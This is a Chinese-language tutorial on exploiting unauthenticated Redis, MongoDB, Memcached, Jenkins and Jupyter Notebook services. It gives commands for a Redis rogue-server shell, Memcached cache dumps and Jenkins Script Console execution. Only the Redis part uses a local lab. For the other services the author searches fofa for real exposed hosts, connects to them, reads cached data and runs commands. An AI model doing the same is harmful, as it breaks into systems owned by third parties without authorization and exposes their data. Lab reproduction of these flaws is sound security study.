一. Redis

复现

首先我们需要用docker启动一个靶机，命令如下

进⼊⽬录：cd /vulhub-master/redis/4-unacc
启动：docker-compose up -d
检查：docker-compose ps

然后在kali上面安装redis程序，命令为

#安装redis
apt-get install redis
#redis链接
redis-cli -h x.x.x.x -p 6379

连接后会弹出以下语言，直接连接上了，不需要认证，就说明存在未授权访问漏洞

接着我们下载redis-rogue-server.py来获取shell，下载连接https://github.com/n0b0dyCN/redis-rogue-server，下载后使用python3启动，然后就可以获取shell了，执行命令如下

python3 redis-rogue-server.py --rhost x.x.x.x --lhost x.x.x.x

二.MongoDB

复现这个漏洞，我选择首先去fofa搜索端口为27017的ip，然后直接用navicat去尝试连接即可

首先打开navicat，点击连接，选择MongoDB，这里的主机填写我们查到的ip，连接名随便填写，然后测试连接

这里我直接找到了一个可以连接的

三.Memcached

首先我们需要下载Memcached程序，下载链接如下

https://www.runoob.com/memcached/window-install-memcached.html

下载后我们利用如下命令安装并启动Memcached漏洞程序

memcached.exe -d install
memcached.exe -d start

然后用telnet去连接有memcached的11211 端口，这里我们去fofa中搜索端口为11211的ip，然后尝试连接，出现如下字样就是连接成功了

然后可以使用命令

stats //查看memcache服务状态
stats items //查看所有items
stats cachedump 39 0 //获得缓存key
get :state:264861539228401373:261588 //通过key读取相应value获得实际缓存内容，造
成敏感信息泄露

nmap -p 11211 --script memcached-info x.x.x.x

四.Jenkins

首先我们利用如下语句在fofa中搜索

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

找到一个页面中有Manage Jenkins的，往下滑会有一个Scritp Console

点开之后我们就可以在里面执行命令了，这里我们执行一个println "whoami" .execute().text，发现成功执行

五.Jupyter NoteBook

同样的，我们在fofa中搜索"Jupyter Notebook" && port="8888"，如果存在未授权访问漏洞，那么点进去会直接跳转到web页面，否则就会到一个登陆页面

登陆页面

web页面

在web页面，我们可以直接创建一个终端来执行命令，点击new里的terminal即可

然后在这里可以直接执行命令